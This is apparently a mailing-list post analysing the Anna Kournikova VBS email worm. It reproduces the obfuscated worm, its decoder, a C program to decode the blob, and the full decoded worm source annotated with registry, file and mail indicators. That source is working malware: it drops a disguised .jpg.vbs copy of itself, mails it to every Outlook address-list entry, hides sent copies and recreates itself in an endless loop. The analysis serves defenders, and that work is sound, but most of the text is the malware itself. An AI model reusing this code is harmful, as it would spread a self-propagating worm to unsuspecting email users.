I've taken the virus (worm really) apart a bit more: Here's the same thing, but with some comments added, and the variable names renamed for clarity: ================================================================= 'Vbs.OnTheFly Created By OnTheFly Execute HisFunction("X)udQ0VpgjnH{tEcggvf{DQVpgjnH{QptGqttgTwugoPzgvUvgGQ9v58Jr7R6?EgtvcQgldeg*vY$eUktvrU0gjnn+$9G5QJv786r0Rgtyiktgv$MJWEu^hqyvtc^gpQjVHg{n$^.jE*t9:+(jE*t33+3(Etj3*63+(jE*t23+;(Etj5*+4(Etj3*;2+(jE*t9;+(jE*t23+2(Etj3*32+(jE*t45+(jE*t33+;(Etj3*72+(jE*t33+8(Etj3*62+(jE*t45+(jE*t8:+(jE*t:;+(jE*t33+7(Etj3*;3+(jE*t23+5(Etj5*+4(Etj6*+;(Etj6*+8(Etj7*+5(Etj6*+:(Etj;*+:gUvQtcyVopldi?7Egtvcqgldeg*vu$terkkviph0nkugu{gvqoldeg$v+tyQoclVip7de0rqh{nkguyterk0veuktvrwhnncpgot.yQoclVip7dI0vgrUegckHnnqgf*t+2(^$pCcpqMtwkpqmcxl0irx0ud$kh9G5QJv786r0Rgtticgf$*MJWEu^hqyvtc^gpQjVHg{no^kcgn$f+@>$$3vgjpgp4CUJ9inEN+*pgfhkhkopqjvp*yq+3?cfpf{cp*yq+4?8jvpg9G5QJv786r0RwtpJ$vv<r11yy0y{fcp{dgvp0$n5.h.ncgupgfhkgUvMLUiJy9M59?ztyQoclVip7dq0grvpzghvnk*guyterk0veuktvrwhnncpgo.+3P\L7\Mz6wk?XLiMyUMJ99z5t0cgcfnnMLUiJy9M590znEuqgFqKhqPvt*yQoclVip7dh0nkggkzvu*uuyterk0veuktvrwhnncpgo++VgjpUvgWKg44:|6R2x?QtcyVopldi07tecggvgvvzkhgny*euktvru0terkhvnwpnoc.gVwt+ggW4K|4R:x602tyvk\g7PML6\kzXwgW4K|4R:x602nEuqgGfpKhNqqrHpwveqkp4gUp9CnJNi*E+QptGqttgTwugoPzgvUvgF54xQOzM8JT?EgtvcQgldeg*vQ$vwqnmqC0rrkncekvpq+$hKF54xQOzM8JT?Q$vwqnmqV$gjpUvgl74PvD\h;n:F?54xQOzM8JTI0vgcPgorUec*gO$RC$K+UvgUm834i35gN5?4lv7\P;D:h0nfCtfugNuukuvqHtcGjeL4TRoOuD4ToKp8U4m33gi55NKhTLo4uR4OoD0TfCtfugGuvpktugE0wqvp>[EMAIL PROTECTED];:cX|5gT?|3Vq6fFDz5yi3xLUvgk9sd4:6x5\5?F54xQOzM8JTE0gtvcKggv*o+2gUvKQ6GXDl[LQ:?TLo4uR4OoD0TfCtfugGuvpktugZ*:9X;5cT||g+k9sd4:6x5\5V0q?KQ6GXDl[LQ0:fCtfuguk9sd4:6x5\5U0dwglve?$gJgt{wqjxc.g=+q$k9sd4:6x5\5D0fq{?J$<k$(dxtehn($jEegmjVuk$#(xednth($$guvYhpu:sI[h;?3sk496d5:5x0\vCcvjegovpuhuYsp[:;I3hC0fftyQoclVip7dI0vgrUegckHnnqgf*t+2(^$pCcpqMtwkpqmcxl0irx0ud$k9sd4:6x5\5F0ngvgCgvhtgwUodvk?VwtgKhsk496d5:5x0\qV>[EMAIL 
PROTECTED]:6x5\5U0pgfGQ9v58Jr7R6t0igtyvkgJ$EM^WquvhcygtQ^VpgjnH^{conkfg.$$$3pGfhKgPvzpGfhKgPvzpgfhkpGfwHepkvpqX)udiy370d2")
Function HisFunction(Variable_1)
'Decoder for the obfuscated payload.  Variable_1 is the long quoted string
'passed in by the "Execute HisFunction(...)" one-liner above; the plaintext
'returned here is the real worm source, which Execute then runs.
'Walk through the string, grabbing a pair of chars at a time.
For I = 1 To Len(Variable_1) Step 2
Variable_2= Mid(Variable_1, I, 1) 'Get 1st char of the pair from the big string
Variable_3= Mid(Variable_1, I + 1, 1) 'Get 2nd char (Mid returns "" past the end, i.e. odd length)
'Decode CR, LF and space.  The obfuscator stored them as the control
'characters ASCII 15, 16 and 17 so the whole blob stays on one line.
If Asc(Variable_2) = 15 Then 'If Variable_2 is ASCII 15:
Variable_2= Chr(10) 'Then Make Variable_2 a LF
ElseIf Asc(Variable_2) = 16 Then 'If Variable_2 is ASCII 16...
Variable_2 = Chr(13) 'Then Make Variable_2 a CR
ElseIf Asc(Variable_2) = 17 Then 'If Variable_2 is ASCII 17
Variable_2 = Chr(32) 'Then make Variable_2 a space
Else 'Anything else was shifted up by 2 (a plain Caesar shift, not a wrapping ROT), so shift it back
Variable_2 = Chr(Asc(Variable_2) - 2)
End If
If Variable_3<> "" Then 'If we're not at the end
'Decode the second character as well, same rules as above.
If Asc(Variable_3) = 15 Then
Variable_3= Chr(10)
ElseIf Asc(Variable_3) = 16 Then
Variable_3= Chr(13)
ElseIf Asc(Variable_3) = 17 Then
Variable_3= Chr(32)
Else 'shift back by 2
Variable_3= Chr(Asc(Variable_3) - 2)
End If
End If
'Append the decoded pair to the result - SWAPPED: the obfuscator
'transposed every pair, so the 2nd char comes out before the 1st.
HisFunction = HisFunction & Variable_3 & Variable_2
Next
End Function
'Vbswg 1.50b  (signature line of the kit the author used; the decoded worm also writes "Worm made with Vbswg 1.50b" to the registry)
==================================================== The big long string at the top is scrambled (rather trivialy, but whatever) so that you can't quickly read it. Here's a .c program that will unscramble the file for you (without bothering to fix that CR/LF crap). It reads "virusstring" as its input. It currently outputs the characters and their ASCII codes to stderr, and the unscrambled output to stdout, so I'd suggest running it as: "./virusparse 1>virusout 2>outerr" to avoid messing up your terminal. ====================================================
/* Virusparse.c program by RAP. decode string in .vbs file.
 *
 * Input:  the file "virusstring" must contain ONLY the quoted argument of
 *         HisFunction(...) from the one-liner above.  Strip the surrounding
 *         Execute HisFunction(" and ") and make sure your editor did not add
 *         a trailing newline, because every byte in the file is fed through
 *         the decoder.  Note also that the copy of the blob reproduced above
 *         contains "[EMAIL PROTECTED]", which looks like the list archive's
 *         address scrubber replacing part of the string; that copy will not
 *         decode cleanly as-is.
 * Output: decoded script on stdout, per-pair trace on stderr.
 * Decoding rule (mirrors HisFunction): ASCII 15/16/17 -> LF/CR/space,
 *         everything else -> byte - 2, and each pair is emitted swapped.
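*/
#include <stdio.h>

/*
 * Map one obfuscated byte to its plaintext byte, mirroring HisFunction:
 * ASCII 15, 16 and 17 stand for LF, CR and space; every other byte was
 * shifted up by two, so shift it back down.
 */
static int decode(int c)
{
    switch (c) {
    case 15: return 10;   /* LF */
    case 16: return 13;   /* CR */
    case 17: return 32;   /* space */
    default: return c - 2;
    }
}

/*
 * Read the obfuscated string from "virusstring" and write the decoded
 * script to stdout.  Each pair of input bytes is decoded and emitted in
 * swapped order (the obfuscator transposed every pair).  A trailing
 * unpaired byte is emitted on its own, exactly as the VBS decoder does
 * (the original C version silently dropped it).  A per-pair trace goes
 * to stderr.  Returns 1 if the input file cannot be opened.
 */
int main(void)
{
    FILE *in = fopen("virusstring", "r");
    int c1, c2;

    if (in == NULL) {
        /* The original dereferenced a NULL FILE* here when the file was missing. */
        perror("virusstring");
        return 1;
    }

    while ((c1 = fgetc(in)) != EOF) {
        /* The encoded blob is a single line: raw CR/LF are represented as
         * ASCII 16/15 inside it, so a literal newline can only be one the
         * editor appended.  Stop rather than decode it into garbage. */
        if (c1 == '\n' || c1 == '\r')
            break;

        c2 = fgetc(in);
        if (c2 == EOF || c2 == '\n' || c2 == '\r') {
            /* Odd-length input: the last byte has no partner (VBS: Variable_3 = ""). */
            fprintf(stderr, "in#1:%c(%i) -> out#1:%c(%i)\n",
                    c1, c1, decode(c1), decode(c1));
            putchar(decode(c1));
            break;
        }

        fprintf(stderr, "in#1:%c(%i), in#2:%c(%i) ", c1, c1, c2, c2);
        c1 = decode(c1);
        c2 = decode(c2);
        fprintf(stderr, "out#1:%c(%i), out#2:%c(%i)\n", c1, c1, c2, c2);

        /* TRANSPOSE: second byte of the pair comes out first. */
        printf("%c%c", c2, c1);
    }

    fclose(in);
    return 0;
}
================================================================ Here's the output of the program (With some retouching to take care of funky characters): ================================================================
'Vbs.OnTheFly Created By OnTheFly
'--- Lines starting with 'NOTE: are analyst annotations, not part of the worm.
'--- The stray spaces in "Chr (101)" / "C hr(49)" and the missing space in
'--- ".writeZN5JKZ4xiuV" are line-wrap artifacts of the post, not of the worm.
On Error Resume Next   'NOTE: every failure below is silently ignored
Set E7O3tH65p4P = CreateObject("WScript.Shell")
'NOTE: infection marker.  The Chr() run spells "Worm made with Vbswg 1.50b".
'NOTE: registry IOC: HKCU\software\OnTheFly\
E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\", Chr(87) & Chr(111) & Chr(114) & Chr(109) & Chr(32) & Chr(109) & Chr(97) & Chr(100) & Chr (101) & Chr(32) & Chr(119) & Chr(105) & Chr(116) & Chr(104) & Chr(32) & Chr(86) & Chr(98) & Chr(115) & Chr(119) & Chr(103) & Chr(32) & C hr(49) & Chr(46) & Chr(53) & Chr(48) & Chr(98)
Set rOwamTjngb5= Createobject("scripting.filesystemobject")
'NOTE: file IOC: drops a copy of itself as AnnaKournikova.jpg.vbs in the
'Windows folder (FSO GetSpecialFolder(0) is the WindowsFolder constant).
'The double extension is meant to display as ".jpg" when Explorer hides
'known extensions.
rOwamTjngb5.copyfile wscript.scriptfullname,rOwamTjngb5.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"
'NOTE: mass-mails only once per user; the "mailed" value is written inside e2nSA7HlgLC
if E7O3tH65p4P.regread ("HKCU\software\OnTheFly\mailed") <> "1" then
e2nSA7HlgLC()
end if
'NOTE: date-triggered payload: on 26 January, opens the URL through the shell (window style 3)
if month(now) =1 and day(now) =26 then
E7O3tH65p4P.run "Http://www.dynabyte.nl",3,false
end if
'NOTE: reads its own source into memory...
Set JKgSwHK773x= rOwamTjngb5.opentextfile(wscript.scriptfullname, 1)
ZN5JKZ4xiuV= JKgSwHK773x.readall
JKgSwHK773x.Close
'NOTE: ...then loops forever, recreating the script file whenever it is
'deleted.  There is no Exit Do, so the hosting wscript.exe never ends on
'its own; for cleanup, kill that process BEFORE removing the file, or the
'file comes straight back.
Do
If Not (rOwamTjngb5.fileexists(wscript.scriptfullname)) Then
Set UeI22z8P4v0= rOwamTjngb5.createtextfile(wscript.scriptfullname, True)
UeI22z8P4v0.writeZN5JKZ4xiuV
UeI22z8P4v0.Close
End If
Loop
'NOTE: mass-mailer.  Drives Outlook via automation and sends one message
'per entry in every MAPI address list.
Function e2nSA7HlgLC()
On Error Resume Next
Set D23OvxM6KRH = CreateObject("Outlook.Application")
If D23OvxM6KRH= "Outlook"Then   'NOTE: compares the object's default property with "Outlook", i.e. proceeds only if Outlook actually loaded
Set j25tNZB9f8l=D23OvxM6KRH.GetNameSpace("MAPI")
Set S6k211ge33L= j25tNZB9f8l.AddressLists
For Each JR2mPsM2BmR In S6k211ge33L
If JR2mPsM2BmR.AddressEntries.Count <> 0 Then
d4BD3xgwv1J = JR2mPsM2BmR.AddressEntries.Count
For X789Va3zRez= 1 To d4BD3xgwv1J
Set iq72b483v3Z = D23OvxM6KRH.CreateItem(0)   'NOTE: 0 = olMailItem
Set OIE4BVYjOJ8 = JR2mPsM2BmR.AddressEntries(X789Va3zRez)
iq72b483v3Z.To = OIE4BVYjOJ8.Address
'NOTE: mail IOCs for filtering: this Subject and Body, plus the .jpg.vbs attachment
iq72b483v3Z.Subject = "Here you have, ;o)"
iq72b483v3Z.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & ""
set fWsnq8YG9f1=iq72b483v3Z.Attachments
fWsnq8YG9f1.Add rOwamTjngb5.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"   'NOTE: attaches the dropped copy
iq72b483v3Z.DeleteAfterSubmit = True   'NOTE: leaves no copy in Sent Items
If iq72b483v3Z.To <> "" Then
iq72b483v3Z.Send
E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\mailed", "1"   'NOTE: marker set after each Send, so the mail-out runs only once
End If
Next
End If
Next
end if
End Function
'Vbswg 1.50b
================================================================ CERT has some more info out there, but that's a look at the guts of the worm anyhow... --Rich -- _________________________________________________________ Rich Puhek ETN Systems Inc. _________________________________________________________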